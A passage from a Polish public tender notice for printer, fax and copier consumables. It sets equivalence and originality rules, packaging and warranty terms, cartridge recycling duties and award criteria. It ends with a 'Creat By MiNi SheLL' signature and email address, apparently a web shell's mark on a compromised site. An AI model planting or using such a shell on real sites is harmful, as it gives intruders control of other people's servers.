formularzu cenowym załącznik nr 1.2. i opisie przedmiotu zamówienia stanowiącym załącznik nr
2.2. do SIWZ,
Uzupełnienie opisu przedmiotu zamówienia stanowią :
. załącznik zał. nr 1.2. - Formularz cenowy;
. zał. nr  2.2. - Opis przedmiotu zamówienia;
. zał. nr 4 - Formularz istotnych postanowień umowy.
CZEŚĆ II zamówienia: materiały eksploatacyjne do drukarek komputerowych, faksów i
kserokopiarek
1.W odniesieniu do wszystkich pozycji ujętych w Formularzu cenowym - załącznik nr 1.2. do SIWZ
Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych.
1.1. Przez produkt równoważny Zamawiający rozumie produkt:
- fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji,
- nie noszący śladów poprzedniego użytkowania,
- którego wydajność jest co najmniej taka, jak materiału oryginalnego zalecanego przez
producenta urządzeń,
- który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez
producenta urządzeń (w szczególności dotyczy koloru),
- który nie ogranicza pełnej współpracy z programem drukarki monitorującej stan zasobników
z tuszem lub tonerem,
- który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej,
dotyczy tonerów
- w którym zastosowano toner dopasowany do pracy z danym urządzeniem
- które nie mogą spowodować zerwania umów gwarancyjnych na sprzęt objęty tą gwarancją
z winy użytkowania niewłaściwych materiałów
- który posiada takie same lub lepsze parametry techniczne, jakościowe, funkcjonalne oraz
użytkowe jak produkt oryginalny, nie spowodują zerwania umów gwarancyjnych, muszą być
w pełni kompatybilne z urządzeniami, w których mają być użytkowane jako materiały
eksploatacyjne.
1.2. Ponadto pod pojęciem fabrycznie nowych - Zamawiający rozumie wyroby wyprodukowane w
przedsiębiorstwie działającym zgodnie z obowiązującymi przepisami prawa. Wszystkie
oferowane materiały winny być opatrzone znakiem firmowym producenta oraz etykietą
zawierającą numer katalogowy i termin ważności. Zamawiający wymaga, aby dostarczone
materiały wyprodukowane były nie wcześniej niż 6 miesięcy przed terminem ich dostawy do
Zamawiającego. Zamawiający nie dopuszcza możliwości zaoferowania materiałów
eksploatacyjnych napełnianych powtórnie lub skopiowanych w sposób naruszający prawo
polskie lub UE.
1.3. W przypadku uszkodzenia urządzenia, którego przyczyną - na podstawie opinii autoryzowanego
serwisu producenta - będzie użycie dostarczanych materiałów eksploatacyjnych innych niż
zalecane przez producenta urządzenia, Wykonawca zobowiązany jest do naprawy urządzenia w
autoryzowanym serwisie, na własny koszt, w terminie nie dłuższym niż 14 dni od daty zgłoszenia
uszkodzenia. Jeżeli Wykonawca nie wywiąże się z obowiązku określonego powyżej lub wywiąże
się w sposób nienależyty, Zamawiającemu służyć będzie prawo zastępczego dokonania
naprawy na koszt i ryzyko Wykonawcy. Koszt wydania opinii stwierdzającej uszkodzenie
urządzenia z winy dostarczonych materiałów eksploatacyjnych ponosi Wykonawca.
Ponadto:
1.3.1. dostarczone materiały eksploatacyjne do urządzeń biurowych muszą być w 100procentach oryginalnie
nowe zalecane przez producenta, nie regenerowane oraz objęte gwarancją, o standardowej
pojemności. Oferty, które będą złożone na materiały eksploatacyjne regenerowane zostaną
odrzucone.
1.3.2. oryginalnie, fabrycznie nowe, wcześniej nie eksploatowane (dotyczy to wszystkich elementów
składowych kardridżów), niedopuszczalne jest zaoferowanie materiałów regenerowanych tzn.wykorzystujących oryginalne materiały używane jak np. dysze, obudowy; czyszczone oraz
ponownie napełniane tuszem lub innymi materiałami eksploatacyjnymi.
1.3.3. elementy składowe nie mogą pochodzić z rynku wtórnego (ze skupu pustych, używanych
wcześniej kardridży).
1.3.4. opakowanie materiału eksploatacyjnego wewnątrz jak i na zewnątrz powinno zawierać pełną
nazwę producenta z opisem zawartości, numerem katalogowym (symbolem) produktu, termin
ważności oraz muszą posiadać minimum 12 miesięczną gwarancję , licząc od daty dostawy
materiału lub każdej partii materiału.
1.3.5. indywidualne opakowania wewnętrzne muszą być hermetycznie zapakowane w mocnej folii
uniemożliwiającej kontakt kardridża z atmosferą (promieniami słonecznymi, wilgocią itp.)
podczas transportu i późniejszego przechowywania.
1.3.6. materiały muszą posiadać jednorazową czytelnie umieszczoną plombę na zewnątrz
opakowania, której obecność gwarantuje, że kardridż nie był wcześniej eksploatowany.
1.3.7. Wykonawca jest zobowiązany do odbioru zużytych (pustych) opakowań po tuszach i tonerach i
poddania ich recyklingowi lub utylizacji na własny koszt. Odbiór przez Wykonawcę pustych
opakowań następować będzie w siedzibie Zamawiającego sukcesywnie po telefonicznym
uzgodnieniu terminu. Wykonawca potwierdzi Zamawiającemu odbiór - kartą odbioru odpadu -
zgodnie z obowiązującymi przepisami prawa w tym zakresie.
UWAGA: w przypadku zaoferowania materiałów oryginalnych, zalecanych przez producenta
urządzenia - określonych przez Zamawiającego w FORMULARZU CENOWYM - Wykonawca w
kolumnie 3 - załącznik nr 1.2. do SIWZ winien wpisać: oryginalny. W przypadku zaoferowania
materiałów równoważnych - w kolumnie 3- załącznik nr 1.2. do SIWZ należy określić
producenta, nadane przez niego oznaczenie oraz określić pojemność, wydajność, Wykonawca
składając ofertę na produkty równoważne musi dołączyć stosowne dokumenty potwierdzające
równoważność oferowanych materiałów eksploatacyjnych, potwierdzenie zgodności parametrów.
2.Uwagi końcowe:
2.1. Podane w formularzach cenowych ilości stanowią jedynie wielkości szacunkowe. Zostaną one ściśle
określone w kolejnych jednostkowych zamówieniach w zależności od bieżących potrzeb Zamawiającego,
przy zachowaniu cen jednostkowych określonych w ofercie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com